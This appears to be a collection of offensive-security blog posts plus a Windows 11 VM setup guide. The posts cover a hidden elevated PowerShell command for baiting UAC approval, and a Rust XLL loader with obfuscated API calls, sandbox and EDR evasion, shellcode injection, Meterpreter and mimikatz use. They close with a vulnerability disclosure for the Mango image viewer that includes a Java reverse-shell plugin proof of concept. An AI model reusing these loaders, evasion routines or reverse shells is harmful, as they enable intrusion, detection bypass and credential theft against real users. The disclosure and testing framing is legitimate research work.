A method to obfuscate the target program from UAC


When a threat actor gains execution on a target’s device, one of their next objectives is often to escalate privileges. While there are numerous methods to achieve this, one particularly intriguing approach involves having the user perform the escalation themselves. If successful, this method could be significantly easier than searching for obscure vulnerabilities, or risking detection through other invasive techniques. UAC bypasses notwithstanding, on modern Windows systems, this typically involves triggering a UAC prompt. However, based on my experience, users have become desensitized to prompts, alerts, and confirmation dialogs. If I were to wager, I’d bet that if 100 users with the necessary privileges were unexpectedly presented with a UAC prompt, more than a few would likely approve it.

Of course, triggering UAC may not always be appropriate or feasible in every situation. However, this idea focuses on scenarios where activating a UAC prompt could be a viable and acceptable trade-off.

Possible situations

One scenario where this approach might make sense, while also increasing the likelihood of user compliance and reducing the risk of raising suspicion, would be if you managed to drop a DLL hijacker or proxy into an application located in the user’s AppData folder. Under normal circumstances, unless the application is executed with elevated or administrative rights, your malicious code will be restricted to the rights of the user (or the process that launched it), likely not ideal.

With code execution established, what if the malicious DLL drops and executes a payload? This payload could then check whether elevation is needed and, if so, attempt to elevate privileges, triggering a UAC prompt.

For instance, imagine the AppData program infected with the malicious node (DLL) file, is Slack. From the user’s perspective, the sequence of events might look like this: they launch Slack, the application begins to load, and then, BOOM! A UAC prompt appears. In reality, it’s not Slack triggering the prompt but rather the malicious payload. However, if I were to place a bet, I’d wager that more than zero users would correlate the launch of Slack with the UAC prompt. Assuming a general desensitization to prompts, it’s likely that more than a few would simply click “Yes” and continue without much thought.

To be clear, I’m using Slack purely as an example; this approach could work with any number of programs. The key point I am trying to make, is that many users are likely to associate the launch of a program they initiated and “trust” with the UAC prompt. Yes, more than a few vigilant users might question the situation, but my theory is that at least some users, perhaps those who aren’t paying attention, will simply click “Yes” without further scrutiny.

The Challenge

Unless you have managed to do some work, or are lucky enough to have gotten a hold of a valid code signing cert, the user will likely be shown something like this:

Yuck! Okay, this looks shady as hell. Even someone who is not paying much attention and/or is pretty desensitized, would likely have questions. Though I still think even with this, over enough time and iterations there would be users who click “Yes,” but I grant this would be a big risk and less likely.

An Idea

So what if we could present the user with a more “comforting” UAC. Maybe something that says “Verified Publisher,” and without the need to obtain a code signing cert? What if the user saw this instead?

Hmmm? Maybe.

The idea is to use PowerShell to launch an elevated cmd.exe process along with arguments so the spawned cmd.exe process then executes our malicious payload. We hide the spawned window to keep questions to a minimum.

The command to achieve this looks like:

powershell -Command "Start-Process cmd.exe -ArgumentList '/c [Path to Evil]' -Verb RunAs -WindowStyle Hidden"

Again using Slack as example, the execution chain/process would look like:

Slack > Malicious DLL > Payload Dropped > PowerShell > UAC > cmd.exe > Malicious Payload = Profit?

This video shows the process in action, starting with the PowerShell execution.

But Wait, that user obviously was already a member of the Local Admin’s Group…

So the above may “work” if your impacted user also happens to be part of the Local Admin Group. Sadly, in many places this is still a thing. Ideally, an organization would have separation of privileges, where users who may have a need for Local Admin rights, are provisioned a separate account which (again ideally) is only used for those times they need to elevate.

In such a scenario the overall method described above still works, with a couple non-trivial caveats; 1) Obviously there is now going to be a bit more friction thrown in because now a targeted user would need to enter their Local Admin user name and password, and 2) For this to work, the targeted user would need to have access to a Local Admin account.

Depending on the target organization, finding a users who has access to a Local Admin account may not be that improbable. Also, again my thesis rests upon the presumption that a UAC prompt appearing in conjunction with an user initiated task (like launching Slack), and with the prompt appearing “generic” with reassuring words like “Verified Publisher,” may have a probability of success higher than what some might assume. If successful the threat actor would gain escalation rather “cheaply,” and “quickly.”

In addition as the malicious DLL is generating (via the above command) the UAC prompt there is nothing which prevents the DLL from somehow checking if the malicious payload process was spawned, and if not, just launching it directly. Thus, even if the user is suspicious, or lacks a Local Admin account, or for whatever reason the elevation fails, remote access is still possible.

Putting this all together…

In this video I show how this may look in a more “traditional” enterprise set up. I also show, Microsoft Defender’s Real-time Protection is enabled. I am working on another post where I will describe how in 2025 it is still possible to execute a Meterpreter session on a fully updated Windows machine running Microsoft Defender; stay tuned…

Configuring a Windows 11 Pro VM in Proxmox


Because Windows 11 has some unique boot requirements, in this post I will describe how to setup a Windows 11 Pro virtual machine within Proxmox.

What is Proxmox

According to their website, Proxmox (technically Proxmox Virtual Environment, or Proxmox VE):

Proxmox Virtual Environment is a complete, open-source server management platform for enterprise virtualization. It tightly integrates the KVM hypervisor and Linux Containers (LXC), software-defined storage and networking functionality, on a single platform.

The enterprise-class features and a 100% software-based focus make Proxmox VE the perfect choice to virtualize your IT infrastructure, optimize existing resources, and increase efficiencies with minimal expense. You can easily virtualize even the most demanding of Linux and Windows application workloads, and dynamically scale computing and storage as your needs grow

In other words, Proxmox VE is an enterprise-grade open source bare-metal hypervisor. Proxmox is “free” to use and is licensed under GNU Affero General Public License, v3 (GNU AGPLv3).

Creating a Windows 11 Pro VM

First we need to gather ISO images we will need for later.

Step 1

  • Login to Proxmox
  • Add the Windows 11 Pro and VirtIO Drivers ISO to Proxmox
    • By default:
      • Select local storage pve
      • ISO Images
      • Upload

Step 2

  • I am going to assume you already have storage configured.
  • By default click “Create VM” in the upper right corner
  • Choose the node you want the VM to belong to (default is pve)
  • Select the VM ID (this should be populated by default)
  • Create a name for the VM (I am using “WinPro”)

Step 3

  • Under “ISO image,” find the Windows 11 Pro ISO image
  • Under “Guest OS” choose “Microsoft Windows” as the type

Step 4

  • The main things to focus on under the System tab are:
    • Machine: q35
    • Add EFI Disk: checked
    • EFI Storage: select the data drive for where the EFI storage will reside
    • SCSI Controller: VirtIO SCSI Single
    • Add TPM: checked
    • Select the TPM storage container under TPM Storage To read more about the various settings and reasons above here are some links to documents which will help answers these questions:
  • TPM Settings
  • Machine type
  • Info on BIOS and UEFI

Step 5

  • Select SCSI under BUS/Device
  • Select the storage container under the “Storage” option
  • Assign how much disk space the VM will have under “Disk Size”

Step 6

  • Configure the number of cores/vcores the VM will have
  • For “Type” select x86-64-AES
  • The next tab “Memory” (not shown), merely assign how much memory (RAM) the VM will be able to access.

That is about it as far as setting up the VM. If you want to configure additional networking you can in the “Network” tab. Once done click “Finish” once on the “Confirm” tab.

Once the VM is created, select the newly created VM > “Hardware,” and then:

  • Add
  • CD/DVD Drive
  • Select the storage drive which contains your ISOs, and then select the virtio-win.iso file downloaded earlier
  • Click Add

This will virtually add the virtio iso image will we likely need later.

Once done your “Hardware” tab should look something like this:


  • Select the VM, “Console” and click “Start”
  • When the Proxmox logo appears press the space bar to boot from CD
  • Follow the Windows 11 PRO installer

Adding Drivers

  • You will likely get to a point where you need to set up/format drives, however, you may also notice no drive options exist.
  • Click “Load Driver”
  • Select the CD Drive that has the VirtIO driver, in the example below this would be the E: drive.
  • Navigate to and /amd64/win11, “Click Install”
  • Once installed the disk space set up during the provisioning of the VM should appear. You can then continue the install as normal.

Once installed, you should be able to boot and run Windows 11 PRO as normal. It may be useful to remove the CD Drives from the hardware tab.

Getting Meterpreter running on Windows with EDR in 2023

In this post, I explore the effectiveness of Rust and XLL in 2023 by demonstrating various binary exploit techniques for executing shellcode on fully patched Windows Server 2019 and Windows 11 Pro systems. I will also evaluate the resilience of prominent EDR products, such as Defender, Defender ATP, CrowdStrike, and Sophos. Furthermore, we will illustrate the process of establishing a Meterpreter shell on Defender (ATP) and Sophos, and utilizing mimikatz for credential extraction.


This publication and its contents are intended solely for educational and research purposes. Do not undertake any actions described herein without obtaining the appropriate consent, permission, and a comprehensive understanding of their potential consequences. If there is any uncertainty regarding consent, permission, or understanding, refrain from engaging in the activities until certainty is established. Unauthorized actions may result in adverse outcomes.


What is Rust?

Rust is a multi-paradigm, high-level, general-purpose programming language. Rust emphasizes performance, type safety, and concurrency. Rust enforces memory safety—that is, that all references point to valid memory—without requiring the use of a garbage collector or reference counting present in other memory-safe languages. To simultaneously enforce memory safety and prevent concurrent data races, Rust’s “borrow checker” tracks the object lifetime of all references in a program during compilation.

source: Wikipedia (accessed, 2023-04-02)

As a relatively new language, Rust poses challenges for Endpoint Detection and Response (EDR) systems, which may struggle to accurately detect and prevent malicious activity in Rust binaries. The unique memory access patterns arising from Rust’s ownership and borrowing system, along with the obfuscation resulting from compiler optimizations, can hinder the efficacy of EDR systems. Furthermore, the constant evolution of Rust’s language and ecosystem contributes to unconventional binary structures that further complicate detection.

Rust also has the ability to create multi-platform applications from a single codebase, which combine to make Rust an attractive option for researchers in offensive development.

What are XLLs?

XLL files are add-in files specifically designed for Microsoft Excel. An XLL file is a dynamic link library (DLL) that contains custom functions, commands, or tools that extend the functionality of Excel. These add-ins are typically written in C, C++, or other programming languages, and they can be loaded into Excel to provide users with new capabilities or custom functionality.

The Power of XLLs:

Remarkably, Windows allows direct user execution of XLL files, which may be perceived by users as simply “opening” a document, akin to an XLSX document. Considering that icons typically appear smaller on most user systems, it is not difficult to envision users overlooking or failing to notice the subtle differences between the Excel icons.

Compiled DLL Binary Standard
Excel Document
Excel Document
/w macros

From an offensive perspective, this scenario offers a notable benefit, considering the prevalence of Excel installations on Windows systems. XLL files provide an opportunity to create compiled binaries capable of interacting with system processes, either through user permissions or various privilege escalation methods. Microsoft attempts to mitigate this risk by displaying a warning; however, given that many users have become desensitized to such alerts, it is not implausible to envision users instinctively clicking “Enable.”

Nonetheless, if relying on users to permit the execution of an XLL is too risky, Microsoft offers a native method to circumvent this warning. Excel, as well as Office applications in general, allows for the designation of folders as “Trusted Locations.” Among other benefits, Trusted Locations enable XLLs to execute without displaying a security warning to the user. In Excel you can view the Trusted Locations here:

Excel > File > Options > Trust Center > Trust Center Settings > Trusted Locations

A noteworthy and well known location is:


Any XLL file placed here will run whenever Excel is launched.

Attack Assumptions:

For this write up and assessment I have assumed a couple things:

  • An attacker managed to introduce an XLL file onto a user’s system through some means, such as a compressed email file attachment, a file download, or potentially by replacing a legitimate Excel document—perhaps on a network drive—with an XLL file.

  • User is running Microsoft Office 365 with default settings applied.

  • The user will click Enable add-in.

    • In my tests, I examined the XLSTART folder and observed consistent results with the given setup. For instance, if the XLL payload executed successfully outside the XLSTART folder, the same occurred within the XLSTART folder. Similarly, if an EDR solution detected the payload outside the XLSTART folder, the same detection occurred inside the folder. The sole distinction between the two scenarios was whether the security warning was displayed or not.

Assessment Setup:

During the tests, multiple system configurations were utilized to stand in as “victim systems”. To simplify referencing these configurations later in this document, each has been assigned a unique System ID.

Victim Systems

System ID System
WIN-SOPHOS Windows Server 2019 Datacenter 1809

2023-03 Cumulative Update for Windows Server 2019 (1809) for x64-based Systems (KB5023702) installed.

EDR Sophos Info:

Updated: 4/1/2023 18:34 UTC

Server Core Agent 2022.4.2.1

Server Intercept X 2022.1.3.3
WIN-CROWDSTRIKE Windows Server 2019 Datacenter 1809

2023-03 Cumulative Update for Windows Server 2019 (1809) for x64-based Systems (KB5023702) installed.

EDR Crowd Strike Info:

WIN-ATP Windows Server 2019 Datacenter 1809

2023-03 Cumulative Update for Windows Server 2019 (1809) for x64-based Systems (KB5023702) installed.
WIN-11-DEFENDER Windows 11 Pro 22H2

Fully updated as of 3/30/2023

In this scenario, the “attacker” employed a remote Kali instance running Metasploit, which was configured to listen for an incoming reverse Meterpreter shell connection.

Attack System

System ID System
KALI Up to date Kali running Metasploit



The inquiry seeks to determine whether it is feasible to execute known malicious shellcode within an XLL package using Rust’s fundamental features without interference from endpoint protection products. Furthermore, the question explores whether executing code as an XLL confers any degree of protection from detection.


Rust is fully capable of generating PE x64 executables in addition to the XLLs that were tested. For this purpose, the test code was modified to compile it as a PE EXE, rather than a DLL/XLL. Notably, the code responsible for handling functions, logic, and methods related to injecting and executing Meterpreter shellcode, as well as communicating with the Kali instance, remained identical.


msfvenom was used to generate shell code for all tests. In order to speed up the iterative process, a couple of functions were added to build.rs to automate:

  1. using msfvenom to create shellcode with the appropriate specifications being tested,
  2. output the shellcode into a rust byte array
  3. transform the byte array into a base64 encode String
  4. add the base64 encoded string into a source file which the compiled binary would later use during run time, to decode, convert back to a byte array, and then load into memory.



let mut msfvenom_cmd = get_command();

if config::METERPRETER_OR_CMD == config::MSVOPTION::CMD {


} else if config::METERPRETER_OR_CMD == config::MSVOPTION::METERPRETER {



For these tests the following Meterpreter payloads were used:

  • windows/x64/meterpreter_reverse_tcp
  • windows/x64/meterpreter_reverse_https
  • windows/x64/exec

The below matrix associates the various systems, with various tests that were ran. The intersection of systems and tests is an ID that will be used to discuss results.

RTCP Slow (Reverse TCP Slow) and RHTTPS Slow (Reverse HTTPS Slow) were included after initial tests revealed that the default Metasploit configuration on the Kali system was excessively conspicuous. By default, when a reverse Meterpreter connection is established, several automatic processes, such as obtaining system information, are triggered. It was observed that these default settings were being detected and intercepted. Consequently, RTCP Slow and RHTTPS Slow were implemented to disable the automatic processes initiated by Metasploit, necessitating manual intervention upon a successful connection; thereby “slowing down,” and altering the normal order of things.

  Reverse TCP RTCP Slow Reverse HTTPS RHTTPS Slow CMD Command

Why use Meterpreter?

It is foreseeable some might argue that Meterpreter is not a instrument threat actors will employ, and that could be a valid perspective. Nonetheless, given Meterpreter’s widespread recognition, its detection serves as a fundamental benchmark. While I have made alterations to Metasploit’s default response to connection requests, no customization was done on the attack payload, beyond the basic configuration parameters available through msfvenom.

Assessment Results:

  • Success: Means either Meterpreter or the msfvenom generated command shell code executed successfully, fulfilled it’s purpose and was to observed to be interdicted by the system’s endpoint protection agent.

  • Fail: Means either Meterpreter or the msfvenom generated command shell code executed, but before any meaningful use could be achieved the system’s endpoint protection agent detected and terminated the process.

  • Unstable: Means either Meterpreter or the msfvenom generated command shell code executed, and in some instances meaningful interaction was achievable, however other times the system’s endpoint detection agent detected and terminated the process.

Result Matrix

  Sophos Crowd Strike ATP Win 11
RTCP-DT Success Fail Unstable Unstable
RTCPS-DT Success Fail Unstable Unstable
RHTTP-DT Unstable Fail Success Success
HSLW-DT Success Fail Success Success
CMD-DT Success Fail Success Success
RTCP-TR Success Fail Unstable Unstable
RTCPS-TR Success Fail Unstable Unstable
RHTTP-TR Unstable Fail Success Success
HSLW-TR Success Fail Success Success
CMD-TR Success Fail Success Success
RTCP-EXE Fail Fail Fail Unstable
RTCPS-EXE Fail Fail Fail Unstable
RHTTP-EXE Fail Fail Fail Unstable
HSLW-EXE Fail Fail Fail Unstable
CMD-EXE Fail Success Unstable Success

Result Cheatsheet

  • RTCP-DT: XLL package containing a Meterpreter Reverse TCP shellcode payload, and the XLL was executed from C:\Users\<user>\Desktop

  • RTCPS-DT: XLL package containing a Meterpreter Reverse TCP (Low and Slow) shellcode payload, and the XLL was executed from C:\Users\<user>\Desktop, except the Metasploit server was configured to not auto execute any tasks.

  • RHTTP-DT: XLL package containing a Meterpreter Reverse HTTPs shellcode payload, and the XLL was executed from C:\Users\<user>\Desktop

  • HSLW-DT: XLL package containing a Meterpreter Reverse HTTPs (Low and Slow) shellcode payload, and the XLL was executed from C:\Users\<user>\Desktop, except the Metasploit server was configured to not auto execute any tasks.

  • CMD-DT: XLL package containing Meterpreter encoded shellcode to run a CMD command, and the XLL was executed from C:\Users\<user>\Desktop

  • RTCP-TR: XLL package containing a Meterpreter Reverse TCP shellcode payload, and the XLL was executed from C:\Users\<username>\AppData\Roaming\Microsoft\Excel\XLSTART

  • RTCPS-TR: XLL package containing a Meterpreter Reverse TCP (Low and Slow) shellcode payload, and the XLL was executed from C:\Users\<username>\AppData\Roaming\Microsoft\Excel\XLSTART, except the Metasploit server was configured to not auto execute any tasks.

  • RHTTP-TR: XLL package containing a Meterpreter Reverse HTTPs shellcode payload, and the XLL was executed from C:\Users\<username>\AppData\Roaming\Microsoft\Excel\XLSTART

  • HSLW-TR: XLL package containing a Meterpreter Reverse HTTPs (Low and Slow) shellcode payload, and the XLL was executed from C:\Users\<username>\AppData\Roaming\Microsoft\Excel\XLSTART, except the Metasploit server was configured to not auto execute any tasks.

  • CMD-TR: XLL package containing Meterpreter encoded shellcode to run a CMD command, and the XLL was executed from C:\Users\<username>\AppData\Roaming\Microsoft\Excel\XLSTART

  • RTCP-EXE: x64 PE executable binary containing a Meterpreter Reverse TCP shellcode payload, and the XLL was executed from C:\Users\<user>\Desktop

  • RTCPS-EXE: x64 PE executable binary containing a Meterpreter Reverse TCP (Low and Slow) shellcode payload, and the XLL was executed from C:\Users\<user>\Desktop, except the Metasploit server was configured to not auto execute any tasks.

  • RHTTP-EXE: x64 PE executable binary containing a Meterpreter Reverse HTTPs shellcode payload, and the XLL was executed from C:\Users\<user>\Desktop

  • HSLW-EXE: x64 PE executable binary containing a Meterpreter Reverse HTTPs (Low and Slow) shellcode payload, and the XLL was executed from C:\Users\<user>\Desktop, except the Metasploit server was configured to not auto execute any tasks.

  • CMD-EXE: x64 PE executable binary containing Meterpreter encoded shellcode to run a CMD command, and the XLL was executed from C:\Users\<user>\Desktop

Result Highlights

Images of WIN-SOPHOS (note WIN-ATP and WIN-11’s results were substantially similar) establishing a successful Meterpreter session with KALI via reverse TCP and then subsequently using mimikatz to dump the SAM hive.

Click to enlarge Click to enlarge Click on image to enlarge

Images of WIN-SOPHOS, WIN-ATP, WIN-11’s (results were substantially similar) establishing a successful Meterpreter session with KALI via reverse HTTPS, manually loading modules (low and slow) and then subsequently using mimikatz to dump the SAM hive.

Click on image to enlarge

On the corresponding endpoints here is an example of what looking at what the process is doing indicates. Here is an example of mimikat reading HKLM\System\CurrentControlSet\Control\LSA\Data

Click on image to enlarge

Image of WIN-CROWDSTRIKE showing calc being launched after being executed via msfvenom generated shellcode loaded into memory via a XLL file.

Click on image to enlarge

Attack Code Review:

Project Structure

| .cargo
| - config.toml
| src
| - data
| - - mod.rs
| - - base64_encoded.rs
| - - settings.rs
| - edr_bypass
| - - mod.rs
| - - edr.rs
| - enums
| - - mod.rs
| - - msfopt.rs
| - helpers
| - - mod.rs
| - - file_helpers.rs
| - - process_helpers.rs
| - - syscall_helpers.rs
| - lib.rs
| target
| - release
| - - < Where your compiled DLL is generated >
| build.rs
| Cargo.toml
| config.rs
| sc.rs

Obfuscation and OPSEC

The basics

Let us discuss obfuscation and operational security (OPSEC). Rust tends to compile a significant amount of metadata about your binary. If your development environment is not configured properly, this metadata could include full paths to your build tools, which may inadvertently expose your username. In Rust, ./cargo and your project path are the two primary paths that appear to pose the most challenges.

Even without installing Rust (Cargo) in your home (Linux) or users (Windows) folder, a path such as D:\rust\project\super_malware\..etc.. can serve as an easily detectable indicator that will likely get you caught quickly.

Rust provides the option to remap path prefixes to mitigate this issue. One method involves editing or creating a .cargo/config.toml file with the appropriate code, for example:

rustflags = [
    "-C", "symbol-mangling-version=v0",
    "-C", "strip=symbols",
    "-C", "panic=abort",
    "-C", "debuginfo=0"

About the other flags:

"-C", "symbol-mangling-version=v0",
"-C", "strip=symbols",
"-C", "panic=abort",
"-C", "debuginfo=0"

Take care of some other house keeping items for us such as, stripping symbols, removing debugging information, and keeping various error messages to a minimum. More about name mangling versions in rust can be found here.


Similar to numerous programming languages such as Python and Java, Rust relies heavily on third-party packages, or crates, to expedite development. However, these crates can contain substantial metadata and, when directly imported using Cargo, control over the code can be limited. Fortunately, crates are often open-source, enabling developers to access individual functions without importing the entire crate. Additionally, some crates permit specifying which modules to include at build time, which can be designated in the Cargo.toml file.

In this example I only import those Win32 Modules I need. In fact, many Win32 API functionality which would be provided for in the windows crate, I decided to implement by hand, as to obfuscate and hide the real purpose of the code.

version = "0.46.0"
features = [

Dynamic loading

In order to frustrate static code analysis, WIN32 API calls to System Services are loaded dynamically at runtime. In addition the name of what is to be called is encrypted at compile time and decrypted when needed during runtime.


pub fn get_kern32() -> String { return lc!("S0g6TkgkEx9mREEk");}


pub fn get_virtual_alloc(alloc_size:usize, protection_flags:u32) -> *mut c_void {
    let kernel32 = load_kernel32();
    let virtualalloc_fn = get_virtualalloc_fn(&kernel32);
    let result = unsafe { virtualalloc_fn(null_mut(), alloc_size, 0x00001000 | 0x00002000, protection_flags) };
    return result;

fn get_virtualalloc_fn(kernel32: &libloading::Library) -> unsafe extern "system" fn(*const c_void, usize, u32, u32) -> *mut c_void {
    let syscall_name = String::from(lc!("VirtualAlloc"));
    let convert_name = syscall_name.as_bytes() as &[u8];
    unsafe {
        let virtualalloc_fn: libloading::Symbol<unsafe extern "system" fn(*const c_void, usize, u32, u32) -> *mut c_void> =
            kernel32.get(convert_name).expect(&lc!("Could not find VirtualAlloc function") as &str);


fn load_kernel32() -> libloading::Library {
    let base64_str:Vec<u8> = general_purpose::STANDARD.decode(get_kern32()).unwrap() as Vec<u8>;
    let base64_bind = base64_str.as_slice();

    let decrypt_bytes = xor_decrypt(base64_bind,&[32,45,72]);
    let decrypt_bind = decrypt_bytes.as_slice();

    let kern32_str = std::str::from_utf8(decrypt_bind).unwrap();
    unsafe { libloading::Library::new(kern32_str).expect(&lc!("Could not load kern32 library") as &str) }

fn xor_decrypt(bytes: &[u8], key: &[u8]) -> Vec<u8> {
    xor(bytes, key)

fn xor(bytes: &[u8], key: &[u8]) -> Vec<u8> {
    let mut result = vec![0; bytes.len()];

    for i in 0..bytes.len() {
        result[i] = bytes[i] ^ key[i % key.len()];


In this implementation, when there is a need to call VirtualAlloc to allocate space for the shellcode, the direct call to VirtualAlloc is avoided due to associated risks. Instead, the get_virtual_alloc function is called.

get_virtual_alloc subsequently calls load_kernel32. However, directly calling “kernel32.dll” within a library loading function could be detected through static analysis, and compile-time optimizations might exacerbate the issue.

To mitigate this risk, the string “kernel32.dll” is XOR-encrypted and Base64-encoded at build time, with a corresponding function created in settings.rs for load_kernel32 to call. The load_kernel32 function decrypts1 the Base64-encoded string and returns a library object to get_virtual_alloc. Next, get_virtualalloc_fn is called to declare VirtualAlloc, which is then used to call the “real” VirtualAlloc.

While “VirtualAlloc” is present in plaintext, precautions are taken to ensure that all static strings are encrypted. The lc macro wraps plaintext code using a crate called litcrypt (see documentation), which encrypts the enclosed strings during build time using a key set as an environment variable. At runtime, the strings are decrypted as needed.

For this project, an additional step has been taken to dynamically generate the litcrypt key for each build, further enhancing security.

0x00001000 | 0x00002000

Continuing on my theme of manual implementation and trying to keep as small foot print as possible, you will notice where possible, I do not use the win32 API types like MEM_COMMIT Instead I know MEM_COMMIT is a DWORD and is represented in hex as 0x00001000. Later on you will notice, I also use this same concept for protection flags and other things. Microsoft’s documentation is the source of this information.

EDR / Sandbox Evasion

Basic efforts were implemented in order to attempt to circumvent and defeat EDR and sandboxing. There were five primary methods implemented. A heuristics scheme was implemented in an effort to provide a better level of accuracy.

The five methods implemented where:

  1. Checked to see if the PID matched the expected name. In the event of an XLL file the file name for the process should be EXCEL.EXE. This check would ensure the PID matched EXCEL.EXE. During the EXE tests, whatever the EXE was named was the named checked against the PID. (True = 1 point)

  2. Regardless of the PID, check to make sure the filename it is running as is as expected. (True = 1 point)

  3. Check the number of CPU cores. (>2 Cores = 1 Point)

  4. Check for time compression. During a 20 second period, the program will check to see 20 seconds did in fact pass or if perhaps some artificial process maybe speeding things up in an attempt to analyze what the binary is doing. This has the added benefit of possibility waiting out some EDRs. (If drift is < 10% = 1 point)

  5. Check to see is a debugger is present. (False = 1 Point)

If the accumulated points is greater than three than assume not running in some protected state / sandbox state.

In case you are wondering, there is no real basis beyond my testing as to why I selected the values I did. This is one area in need of more analysis.

Moreover, although not a scoreable item, another technique implemented involved calling a random factorization function before executing the aforementioned five tests. This function’s sole purpose was to process and factor various random numbers multiple times and perform other mathematical operations. The intention behind this approach was to potentially deceive any automated monitoring systems by simulating legitimate and benign calculations, thereby masking any malicious activities.

The exploit


async extern "system" fn xlAutoOpen() {
    let filename = settings::get_binary_name().await;
    let pid = get_pid().await;
    let pass = edr_bypass(filename, pid).await;

    if pass {
        let sc: Vec<u8> = get_sc().await;

async fn get_sc() -> Vec<u8> {
    let base64_str:Vec<u8> = general_purpose::STANDARD.decode(get_b64encoded_str()).unwrap() as Vec<u8>;
    return base64_str.as_slice().to_owned();

fn inject(shell_code: &[u8]) -> bool {

    let handle= get_process_handle();
    let address = get_virtual_alloc(shell_code.len(), 0x04);

    if !address.is_null() {

        let write_result = write_process_memory(handle, address, shell_code);

        if write_result == true {

            if virtual_protect(address, shell_code.len(), 0x40, &mut 0x04) {
                let h = create_remote_thread(handle, address);

                wait_for_object(h, 50000);

                match settings::get_msfv_type().parse::<MSVOPTION>() {
                    Ok(MSVOPTION::CMD) => { close_handle(handle); },
                    Ok(MSVOPTION::METERPRETER) => { loop { unsafe { Sleep(1000) } } },
                    Err(_) => { println!(); }
                return true;
    return false;

The above code shows lib.rs as the primary entry point, which is subsequently converted to main.rs when compiling a PE file. Regardless of the conversion, the workflow remains consistent:

  1. Acquire the anticipated binary name, which will be employed later in the EDR phase. Notably, this information is preserved as an XOR encrypted, base64 encoded string.

  2. Retrieve the process PID (Process Identifier).

  3. Execute EDR and Sandbox assessments; proceed only if the evaluations yield a positive result, otherwise terminate the process.

  4. Obtain the shellcode, which is preserved as a base64 encoded string. Note: msfvenom during the creation phase has already taken care of XOR encryption.

  5. Proceed to load and execute the shellcode.

Result Conclusion

The conducted tests demonstrated that employing a Rust XLL increased the success rate of msfvenom generated shellcode execution, leading to the creation of a Meterpreter reverse shell. Additionally, this method enabled the use of mimikatz to extract sensitive data without EDR agent detection. The probability of success was further improved by customizing the attack tools’ default settings to avoid typical post-exploitation behavior.

Future Next Steps

At present, I am engaged in refining the code employed in this evaluation to develop a Rust-based exploit testing tool utilizing the build time shellcode generator and other details outlined here. This tool would aim to facilitate the rapid generation and iteration of tests for various msfvenom generated shellcode scenarios and be focused on bypassing EDRs, sandboxes, and complicating static and dynamic analysis.

For those who find this project intriguing, please consider following my GitHub repository, as this platform will serve as the release and launch venue for any future projects. If you are interested in contributing or have suggestions for enhancement, please reach out via LinkedIn. The link can be located on my GitHub page.


The following people / entities were sources of inspiration, motivation or resources for this project and deserve all the credit they are due.

  • White Knight Labs: This research simply would not have happened without White Knight Labs’ Offensive Development course. Period.

  • Antisyphon Training: Antisyphon hosts the best and most affordable cybersecurity training you will find. A lot of motivation and inspiration comes from training provided by them.

  • Michael Taggart: GitHub Project was a major source of inspiration.

  • Sylvain Kerkour: I am not a Rust Programmer. Sylvain’s book Black Hat Rust was a huge help in getting a jump start.


  1. This CyberChef recipe shows exactly how the base64 encoded string goes from being base64 encoded, to XOR decryption and becomes “kernel32.dll”. 

Mango Vulnerability Disclosure Report

Mango – short for Multi-image Analysis GUI – is a viewer for medical research images. It provides analysis tools and a user interface to navigate image volumes.

source: https://ric.uthscsa.edu/mango/index.html {: .source}



Version Date Author Comment
1.0 2022-06-13 Jo Initial document
1.1 2022-07-31 Jo Added CVE-2022-34567

Disclosure Timeline

Disclosure followed 90-day timeline used by Google’s Project Zero

Date Comment
2022-03-22 UT’s Information Security Office notified via email, response was to contact UTHSCSA’s Security Team (provided with email).
2022-03-22 UTHSCSA Security Team notified via email. Advised of responsible disclosure
2022-03-23 UTHSCSA Security Team sent update via email (note: this was a unilateral action, no response from UTHSCSA had been received.)
2022-06-22 Vulnerability reported to MITRE.
2022-06-22 Vulnerability published publicly.
2022-07-28 CVE-2022-34567

Application Details

Vulnerability: Insecure Plugin Use/Implementation.

Overview: Mango allows 3rd party developed plugins to be used. The product page contains a list of some plugins that have been developed. Mango plugins are written in Java, as a platform-agnostic language, Java gives developers a lot of control over the operating system. Mango does no plugin validation, or provides any notice to users if “new” plugins were to be added. In short, any properly crafted plugin added to the plugin folder (user writable) will automatically be loaded by Mango and executed. This can result in a threat actor crafting a malicious plugin that, if deployed, would result in a threat actor achieving remote access with the same rights as the user running Mango.

Details: Assessor created a customized plugin and deployed and deployed on a Windows test environment. The plugin was designed to integrate into Mango and, once loaded, would establish a connection (“reverse shell”) back to a remote testing computer (“attacker”).

Two tests were attempted and succeeded. Both attempts involved crafting a customized plugin (we named “Evil Plugin”) and with user-level permissions moving Evil Plugin into C:\Users\<user name>\AppData\Roaming\Mango\Plugins. One attempt created a reverse shell to a remote computer the other test executed Calculator to demonstrate the ability to execute code on the system.

Screenshot showing pre and post move folder / results

The above image shows we started off with an empty plugin folder. With the Evil Plugin on the Desktop. We then move the plugin from the Desktop to the plugin folder. No errors are encountered. We then load Mango and observed the settings, the Evil Plugin was loaded.

Reverse Shell - Victim side post execution. Reverse Shell - Attacker side post execution. Calculator Execution

Plugin Proof of Concept Code

package edu.uthscsa.ric.plugins.mangoplugin;

import java.net.URL;
import edu.uthscsa.ric.mango.MangoContext;
import edu.uthscsa.ric.mango.MangoData;
import edu.uthscsa.ric.mango.MangoPlugin;
import edu.uthscsa.ric.mango.ViewerController;
import edu.uthscsa.ric.mango.viewerslice.VolumeManager;
import edu.uthscsa.ric.volume.ImageVolume;

public class ExamplePlugin implements MangoPlugin {

	public void doOperation(MangoContext mango, VolumeManager viewer) {

		String host="";
		String cmd="cmd.exe";
		int port=4444;

		Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
		Socket s = new Socket(host,port);
		InputStream pi = p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
		OutputStream po = p.getOutputStream(),so=s.getOutputStream();
		while(!s.isClosed()) {
			try {
			}catch (Exception e){}

	public void doOperation(MangoData data, ViewerController controller) { }

	public String getMinimumVersionSupported() { return null; }

	public String getPluginName() { return "My Reverse Shell Plugin"; }

	public URL getPluginURL() { return null; }

	public String getVersion() { return null; }

	public boolean hasNewerVersion() { return false; }

Observed Common Weakness Enumeration (CWE)

CWE Name Common Consequences Description
CWE-345 Insufficient Verification of Data Authenticity Varies by Context The software does not sufficiently verify the origin or authenticity of data, in a way that causes it to accept invalid data.
CWE-346 Origin Validation Error An attacker can access any functionality that is inadvertently accessible to the source. The software does not properly verify that the source of data or communication is valid.
CWE-358 Improperly Implemented Security Check for Standard Bypass Protection Mechanism The software does not implement or incorrectly implements one or more security-relevant checks as specified by the design of a standardized algorithm, protocol, or technique.
